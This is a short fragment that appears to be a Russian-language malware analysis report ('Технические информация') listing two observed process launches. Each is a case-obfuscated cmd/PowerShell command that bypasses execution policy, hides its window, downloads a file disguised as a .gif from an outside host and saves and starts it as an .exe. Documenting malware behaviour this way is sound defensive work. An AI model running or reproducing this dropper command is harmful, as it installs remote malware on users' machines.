Техническая информация
- '<SYSTEM32>\cmd.exe' /c "PwErsHELl.Exe -ExEcUtIONPlIcy bYpAsS -NPRfIlE -wINDOwsTylE hIddEn (New-OBjECT SystEm.net.wEBCLIeNT).dWnlOaDfILE('http://www.znedpesa.tp/read.php?f=1.gif','%AppdATA%.exE');STaRT...
- '<SYSTEM32>\cmd.exe' /c "PwErsHELl.Exe -ExEcUtIONPlIcy bYpAsS -NPRfIlE -wINDOwsTylE hIddEn (New-OBjECT SystEm.net.wEBCLIeNT).dWnlOaDfILE('http://www.znedpesa.tp/read.php?f=1.gif','%AppdATA%.exE');STaRT...' (со скрытым окном)